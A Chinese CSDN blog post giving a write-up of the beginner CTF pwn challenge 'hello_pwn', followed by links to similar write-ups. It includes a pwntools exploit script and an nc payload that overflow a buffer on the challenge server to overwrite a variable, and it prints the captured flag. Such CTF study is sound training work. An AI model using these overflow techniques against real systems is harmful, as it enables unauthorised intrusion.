攻防世界 Pwn hello_pwn

最新推荐文章于 2024-06-30 15:13:02 发布

==Microsoft==

最新推荐文章于 2024-06-30 15:13:02 发布

阅读量391

点赞数

分类专栏： Pwn 文章标签： pwn

本文链接：https://blog.csdn.net/MrTreebook/article/details/120832094

版权

Pwn 专栏收录该内容

57 篇文章 3 订阅

订阅专栏

攻防世界 Pwn hello_pwn

在这里插入图片描述

文章目录

攻防世界 Pwn hello_pwn
总结
题目下载地址

1.checksec走一下

在这里插入图片描述
可以看到只有 Partial RELRO
没有开启栈保护，是属于简单的栈溢出pwn题

2.先跑一下看看

在这里插入图片描述

## 3.拉进IDA看一下

在这里插入图片描述
sub_400686函数中调用系统函数直接获取flag
因此如果让60106c == 1853186401就可以获取到flag
看到危险函数read可以实现栈溢出，把601068填满后再覆盖60106c即可

偏移地址是4
然后打入p64（1853186401）

4.exp如下

##coding=utf8
from pwn import *
## 构造与程序交互的对象
sh = remote('111.200.241.244', 52706)
## 构造payload
payload = b'x' * 4
payload = payload + p64(1853186401)
print(p64(1853186401))
## 向程序发送字符串
sh.recvuntil("lets get helloworld for bof\n")
sh.sendline(payload)
## 将代码交互转换为手工交互
sh.interactive()

5.运行结果如下

在这里插入图片描述
成功获取到flag

cyberpeace{5e30657f17da9ee9ce8066fbfca87bed}

6.可以不用python

直接nc服务器然后发送垃圾数据+p64(1853186401)即可

nc 111.200.241.244 52706
xxxxaaun

4个‘x’（垃圾数据）+aaun

总结

这是一道简单的pwn入门题，运用了简单的栈溢出

题目下载地址

点击下载

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

==Microsoft==

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
打赏
4
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

攻防世界(pwn篇)---CGfsb

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

04-09

1787

攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述菜鸡面对着pringf发愁，他不知道prinf除了输出还有什么作用基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO，如果开启FULL RELRO，意味着我们无法修改got表 2.S

[CTF-PWN]攻防世界新手村-hello_pwn[wp]

murongxuege的博客

10-01

2612

事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候，从头到尾刷一遍题，总结思路。题目分析开启场景后，服务端会开启对应的端口，并在端口上部署和附件相同的ELF二进制可执行文件，我们要做的就是下载附件并在本地进行反汇编，反编译等操作分析程序漏洞，从而利用漏洞获取题目的flag。从描述中可以看出当前程序是要进行年龄的输入操作的，有输入操作，还是在新手村，那么大概率是gets()等C函数输入漏洞，进一步猜测是普通的内存地址覆盖的题。 che

4 条评论您还未登录，请先登录后发表或查看评论

【攻防世界pwn-hello_pwn】

a_silly_coder的博客

01-16

1956

下载文件后，首先检查保护：将文件拖入64位ida，查看代码基本逻辑是：读取一个输入，存入unk_601068，接着比较dword_60106C是否等于一个预期的值，如果相等，执行对应函数，函数内直接执行cat flag.txt 所以思路就是需要覆盖dword_60106C，让其等于预期值，此时我们需要在输入unk_601068时，对dword_60106C进行覆盖，接着我们查看这两个值的存放位置。发现这两个值之间相隔4个字节，所以需要4个字节的填充数据，接着输入预期值。..

攻防世界 - pwn - hello_pwn

qq726232111的博客

03-16

1007

A、程序分析 1、缓冲区地址为601068h 2、判断条件 --> 60106Ch为起始地址，存储6E756161h 3、判断条件成立执行cat flag B、利用分析 1、601068h -60106Bh --> 4byte 填充数据 60106Ch - 60106Fh --> 4byte 判断条件 0x6E756161 ...

攻防世界-hello_pwn

qq_52333044的博客

06-22

263

第一种：通过先输入四给任意字符再输入"aaun" （为什么是aaun呢，因为小端序和大端序的问题，小端序低地址存低位，大端序就是低地址存高位，这里采用小端序）unk-601068和dword——60106C相差4 个字节，然后我们可以通过覆盖来改变dwod_60106c的赋值。发现当unk_601068等于nuaa时才能得到flag。习惯性的用ls没有什么用，然后查看是多少位。然后用64位IDA打开查看程序。用kali linux 打开。第二种：就直接写exp。

攻防世界PWN-hello_pwn

Deeeelete的博客

11-14

426

题目：hello_pwn 进pe查看程序因为该题目比较简单，所以确认是64位程序，直接进IDA f5反编译main函数单独摘出代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { alarm(0x3Cu); setbuf(stdout, 0LL); puts("~~ welcome to ctf ~~ "); puts("lets get helloworld for bof"); re

攻防世界hello pwn WP（pwn入门基础题）

m0_62584974的博客

11-21

2174

攻防世界hello pwn WP（pwn入门基础题）的简单讲解

初学pwn-攻防世界(hello_pwn)

天柱的博客

08-26

3499

初学pwn-writeUp 攻防世界的第二道题目，hello_pwn。首先创建场景，使用nc进入远端，发现他只输出了一串字符串，没有别的内容，也无法使用ls查看它的文件。下载场景提供的文件，使用cat查看，发现是ELF文件，按照大佬的流程，ELF文件直接用ida打开。初次使用ida，深切的感受到了ida的强大。打开之后，按F5，进行反编译，可以看到main函数的伪代码可以从main函数中看到，这里存在一个判断，如果条件达成的话，会调用一个函数。点开函数看一下。可以发现里边会输出flag.tx

【pwn】攻防世界 pwn新手区wp

woodwhale的博客

08-10

7289

【pwn】攻防世界 pwn新手区wp 前言这几天恶补pwn的各种知识点，然后看了看攻防世界的pwn新手区没有堆题（堆才刚刚开始看），所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题，连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看

攻防世界hello _pwn总结

RMC131的博客

11-13

4607

checksec 转自：checksec工具使用-pwn – 简书 (jianshu.com) 基本用法：checksec –file=hello_pwn Arch：系统架构信息，判断是64位还是32位，选择相应的IDA和写相应的exp。 amd64-64-little说明为64位，选用64位的IDA，写64位的exp。 RELRO： Relocation Read-Only (RELRO)，此项技术针对GOT/GIFTO(区块链)改写的攻击方式。分为两种，Partial RELRO 和 Full RE

攻防世界：hello_pwn

2301_80216972的博客

04-09

380

pe分析知道是elf文件（elf文件是Linux下的可执行文件，可以在Linux直接运行）ida分析：下载后ida打开找到main函数，F5反编译。

攻防世界 hello_pwn

最新发布

weixin_73399382的博客

06-30

393

然后从指针&unk_601068指定的缓冲区里面读取最多16位数据（0x10uLL解读：0x代表十六进制，uLL=unsigned long long,无符号long long 型，10转为十进制即为16）直接执行一下，这里看别人的wp是可以通过输入构造字符串来getshell的，我这里就不这么做了，多练写脚本的能力。国际惯例checksec一下，64位小端序，未开启栈溢出保护和地址随机化，很明显这道题利用栈溢出了。刚学pwn的小白，大家互相学习，看看哪里说得不对打在评论区！写脚本，下面两个略微差别。

[攻防世界]hello_pwn

逆向萌新的博客

06-20

310

[攻防世界]hello_pwn

攻防世界pwn刷题--hello_pwn

m0_74073577的博客

09-29

207

0x60106c-0x611068=4个字节，那么输入4个a就可以到达目标地址（python里b’a‘的长度是一个字节），再输入‘nuaa‘即可，需要注意的是checksec后是小端序，绝大部分题目都是小端序，所以数据高位应该在地址低位，即输入’aaun‘，总体的payload应该是aaaa+aaun，如果暂时无法理解这个亦可以使用pwntools工具，使用p64打包数据即可，这样的话payload应该是payload=b’a‘*4+p64(0x6E756161),这个0x6E。结果是‘nuaa’。

攻防世界-pwn-新手-hello_pwn

weixin_31610083的博客

10-16

260

【题目描述】 Pwn! Segment fault！菜鸡陷入了深思【附件】在线场景和文件【过程及思路】放到linux下，checksec一下，检查程序位数。发现是64位的程序。放进IDA，找到main函数，F5反编译得到下图。第7行，程序读取从起始位置开始的10个长度，也就是说我们有10个长度的写入权限。第8行，判断指定位置是否是某个值。第9行，函数的功能是cat flag.txt，我们从这个条件入手，构造出程序要求的值。进到值条件判断的位...

攻防世界_pwn_hello_pwn(萌新版)

TedLau的博客

02-24

580

首发于鄙人博客：传送门 0x00 前言 file checksec已省略。64位elf程序 0x10 步骤 0x11 main函数在main函数中我们可以看到，它让我们输入unk_601068的值，而如果我们想getshell，那么我们便需要将dword_60106c的值赋为1853186401。 0x11 bss段观察可以看到这两个数据的距离并不远，所以...

攻防世界pwn第二题-hello pwn（两种方法）

Greic的博客

11-28

2110

嘿嘿，我又回来了。看到上次自己发的博客，感觉图片的排版好差劲这次我将！搞好一点（hhh），话不多说，开始。至于前面的检查保护类型和看文件类型就不说了，有兴趣的小伙伴们可以看看pwn的第一题。有一说一，其实这道题已经有很大大佬发过write-up了，大佬们也写的很好，我在做题的过程中，也看过一些大佬们的write-up，但嘛，写一写，总是比没有好叭。在检查完文件类型和保护机制后，我们很容易发现，就是一个很普通的64位的Linux件，且并没有什么保护类型。这个时候，我们先运行看看...

攻防世界base除4_攻防世界pwn新手训练

weixin_36310597的博客

12-24

599

小白刚开始接触pwn，做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道，很多都是看别人的wp才知道要干嘛，比如才知道原来printf函数也是有漏洞的。把这些题的思路和做法记录下来，不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述：运行就能拿到shell呢，真的如题，nc连接，连接直接就是shell，直接cat flag就可以了。CGfsb题目描述：菜鸡面对着pringf发愁，...

攻防世界 pwn repeater

09-13

攻防世界是一个CTF竞赛平台，其中包含了各种类型的题目，包括pwn和repeater题目。根据引用中提到的信息，攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致，导致出现了这种情况。至于...